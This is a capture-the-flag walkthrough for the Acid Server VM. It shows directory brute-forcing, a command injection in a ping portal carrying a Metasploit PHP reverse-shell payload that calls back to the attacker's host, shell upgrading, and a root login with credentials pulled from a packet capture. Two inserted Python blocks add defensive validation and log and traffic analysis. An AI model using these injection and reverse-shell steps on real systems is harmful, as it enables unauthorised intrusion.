
Hack the Acid VM (CTF Challenge)

The virtual machine we are going to crack is called "Acid Server". It is a Boot2Root VM with a web-based attack surface. Our main goal is to escalate privileges to root and capture the flag.
Walkthrough
As always, start by finding the target on the network:
netdiscover

Our target is 192.168.0.105. Now fire up nmap to scan the ports.
nmap -p- -A 192.168.0.105

Nmap shows that only one port is open, 33447, running HTTP. Note that port 80 is not open, so to open this IP in the browser we have to give the port number explicitly; the default port will not work. So open the web page using the port number.
There is only a heading and a quote on the page, nothing else. But if you look at the browser tab, it says "/Challenge". This could be a directory, so let's open it.
Opening /Challenge brings up a login portal. Let's learn more about /Challenge using DirBuster: paste the link from the browser into the Target URL box, click Browse next to "Files with list of dirs/files" and select the 2.3-medium wordlist, then click Start.
Clicking Start produces a list of directories.

I went through every directory, but only cake.php was useful. Open it in the browser. cake.php says "ah.haan…There is long way to go..dude J", but if you look closely you will find /Magic_Box written on the tab. Let's open it in the URL just like before.
Opening /Magic_Box says that access to the page is forbidden. That is not a problem: let's run DirBuster on it. Give it the URL and the 2.3-medium wordlist just as before, then click Start.
The result shows the names of the directories.

Of all of those, command.php is the only one that proved useful. Open it in the URL.

Here you will find a ping portal, meaning you can ping any IP address from it. Let's try pinging an IP. (You can ping any IP, but I am going to ping the loopback address, 127.0.0.1.)
Once the IP has been pinged, view the page source. In the page source you can see that the results of the ping are shown.
If the page shows the ping output, the address we submit is being passed to a shell command, so we can use this portal to deliver our payload with the web_delivery exploit. To do so, open a terminal in Kali, start Metasploit by typing msfconsole, and then type:
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
web_delivery is a multi-platform module, meaning it can be used with several script interpreters. I have set the target to 1 because target 1 refers to PHP, and as we are using a PHP payload the target has to match.
Running the exploit gives you a one-line command. Copy it and paste it into the ping portal after the IP you are pinging, separated from it by a semicolon (;):
127.0.0.1; *<code>*
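The ping portal above can be abused because the submitted address is handed to a shell, which is why a semicolon lets a second command through. The Python below is added here and is not code from the walkthrough or from the Acid VM: it shows the vulnerable way of building the ping command beside a hardened one (allow-list the value with the ipaddress module, run without a shell), and a check over a few constructed web-server log lines that flags any submitted value which could not have been a plain IP address. The log format, the paths and the query parameter name ip are assumptions.

```python
# Added example: OS command injection in a "ping portal", the hardened
# form, and a log check. Not code from the original walkthrough or the VM.
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

PING_COUNT = "4"


def build_ping_command_vulnerable(user_input: str) -> str:
    """How a portal like command.php typically goes wrong: the submitted
    value is glued into one shell command string. A ';' in the input ends
    the ping and hands the rest of the line to the shell. Returned only,
    never executed here."""
    return f"ping -c {PING_COUNT} {user_input}"


def validate_ping_target(value: str):
    """Allow-list check: accept only a syntactically valid IPv4/IPv6
    address and return it in canonical form; anything else gives None.
    Shell metacharacters can never survive this check."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def build_ping_command_safe(value: str) -> list:
    """Hardened form: validate first, then build an argv list. Passed to
    subprocess with shell=False, the address is a single argument to ping
    and is never interpreted by a shell."""
    addr = validate_ping_target(value)
    if addr is None:
        raise ValueError(f"not an IP address: {value!r}")
    return ["ping", "-c", PING_COUNT, addr]


def run_ping(value: str, timeout: int = 10) -> str:
    """Execute the hardened command without a shell (not used by the tests)."""
    proc = subprocess.run(build_ping_command_safe(value), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


# Combined-log-format request line; the log layout is an assumption.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_injection_attempts(log_text: str, param: str = "ip") -> list:
    """Scan access-log lines for requests whose `param` value is not a
    plain IP address. Returns (client, timestamp, decoded value) tuples."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get(param, []):
            if validate_ping_target(value) is None:
                hits.append((m.group("client"), m.group("ts"), value))
    return hits


# Constructed log lines (not from the Acid VM); the portal is assumed to
# take the address as a GET parameter named "ip".
SAMPLE_LOG = """\
192.168.0.104 - - [10/Mar/2024:14:02:11 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1 HTTP/1.1" 200 612
192.168.0.104 - - [10/Mar/2024:14:02:40 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1%3B%20id HTTP/1.1" 200 734
192.168.0.104 - - [10/Mar/2024:14:03:05 +0000] "GET /Challenge/cake.php HTTP/1.1" 200 301
192.168.0.104 - - [10/Mar/2024:14:03:30 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1%3B%20uname%20-a HTTP/1.1" 200 9120
"""

if __name__ == "__main__":
    print(build_ping_command_vulnerable("127.0.0.1; id"))
    print(build_ping_command_safe("127.0.0.1"))
    for client, ts, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{ts} {client} suspicious ip value: {value!r}")
```

The allow-list is deliberately strict: rather than trying to strip or escape shell metacharacters, it only lets through something the ipaddress parser accepts, and the argv list means there is no shell to interpret the value anyway. The same validator doubles as the detection rule, since any value that fails it was never an honest ping request.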
As soon as you click Submit, you will have a Meterpreter session in Metasploit. Once you have the session, type the following commands to get a proper terminal:
shell
python -c 'import pty; pty.spawn("/bin/bash")'
Then type the following command to list the directories:
ls -l /
In the list you will find a directory called s.bin. Let's go into that folder and list its files; for that type:
cd /s.bin
ls
Here you will find a PHP file. Let's read it:
cat invesgitate.php
When you read it, it shows the message "now you have to behave like n investigator to catch the culprit".
The directory listing from before also contained a folder called sbin. Let's go into that folder and list its files; to do so type:
cd sbin
ls
In the list of files you can see one named raw_vs_isi. Let's check it out:
cd raw_vs_isi
ls
It contains only one file, called hint.pcapng. This is a Wireshark capture file. There are many ways to download it, but they are usually lengthy, so I used a shortcut: simply terminate your shell session and go back to the Meterpreter session.
There, check your current working directory and list it by typing:
pwd
ls
Then type:
download hint.pcapng /root/Desktop/hint.pcapng

Now the file is downloaded to your desktop. I went through every packet and found a conversation in the TCP stream of the 90th packet. Right-click that packet, click Follow, then select TCP Stream.
It will open the conversation as shown in the image below:

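The Follow TCP Stream step works because this conversation ran over a plaintext protocol: Wireshark reorders the captured segments of each direction by sequence number and concatenates their payloads, so anyone holding the capture can read it. The Python below is added here and is not taken from the walkthrough or from hint.pcapng: it reimplements that reassembly over a few constructed packets (the addresses and messages are made up, and they include an out-of-order segment and a retransmission) and then searches the rebuilt streams for keywords, which is the check a defender runs over captures to find credentials moving in cleartext.

```python
# Added example: how "Follow TCP Stream" reassembles a plaintext
# conversation from individual segments. Constructed packets, not the
# contents of hint.pcapng.
from collections import defaultdict

A = "192.168.0.12:51234"   # hypothetical chat client
B = "192.168.0.40:7777"    # hypothetical chat peer

P_A1 = b"hey, any idea who runs this box?\n"
P_B1 = b"his name is saman and now a days "
P_B2 = b"he's known by the alias of 1337hax0r\n"
P_A2 = b"thanks\n"

# (capture index, src, dst, tcp seq, payload). Packet 2 was captured
# before the segment that precedes it, and packet 4 is a retransmission.
PACKETS = [
    (1, A, B, 1000, P_A1),
    (2, B, A, 2000 + len(P_B1), P_B2),
    (3, B, A, 2000, P_B1),
    (4, B, A, 2000, P_B1),
    (5, A, B, 1000 + len(P_A1), P_A2),
]


def reassemble(packets):
    """Rebuild each direction's byte stream: order segments by sequence
    number, drop bytes already seen (retransmissions / overlaps) and mark
    any hole where a segment was not captured. Returns {(src, dst): bytes}."""
    by_direction = defaultdict(list)
    for idx, src, dst, seq, payload in packets:
        by_direction[(src, dst)].append((seq, idx, payload))
    streams = {}
    for direction, segments in by_direction.items():
        segments.sort()
        buf = bytearray()
        next_seq = None
        for seq, _idx, payload in segments:
            if next_seq is None:
                next_seq = seq
            if seq < next_seq:
                overlap = next_seq - seq
                if overlap >= len(payload):
                    continue                 # full retransmission, nothing new
                payload = payload[overlap:]  # partial overlap: keep new tail
                seq = next_seq
            if seq > next_seq:
                buf += b"[%d bytes missing]" % (seq - next_seq)
                next_seq = seq
            buf += payload
            next_seq = seq + len(payload)
        streams[direction] = bytes(buf)
    return streams


def search_streams(streams, keywords):
    """Return (direction, line) for every reassembled line that contains
    one of the keywords, case-insensitively: the kind of check a defender
    runs over a capture to find credentials travelling in cleartext."""
    hits = []
    wanted = [k.lower() for k in keywords]
    for direction, data in streams.items():
        for line in data.decode("utf-8", "replace").splitlines():
            if any(k in line.lower() for k in wanted):
                hits.append((direction, line))
    return hits


if __name__ == "__main__":
    streams = reassemble(PACKETS)
    for (src, dst), data in streams.items():
        print(f"{src} -> {dst}:\n{data.decode()}")
    for direction, line in search_streams(streams, ["alias", "password"]):
        print("cleartext hint:", direction, line)
```

Real captures add TCP connection tracking and wrapped sequence numbers, which this sketch leaves out, but the core is the same: a plaintext protocol gives whoever captured the traffic the whole conversation, which is why cleartext chat, telnet or HTTP logins show up in monitoring rules.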
In the conversation one of them says "saman and now a days he's known by the alias of 1337hax0r", which means saman is the username and 1337hax0r could be the password. Let's try it. Type shell again to reach the terminal and log in with the username we just found:
su saman
1337hax0r
sudo saman
1337haxor
And with that you are root. Now go into the root folder and see what it has to offer:
cd /root
ls
cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
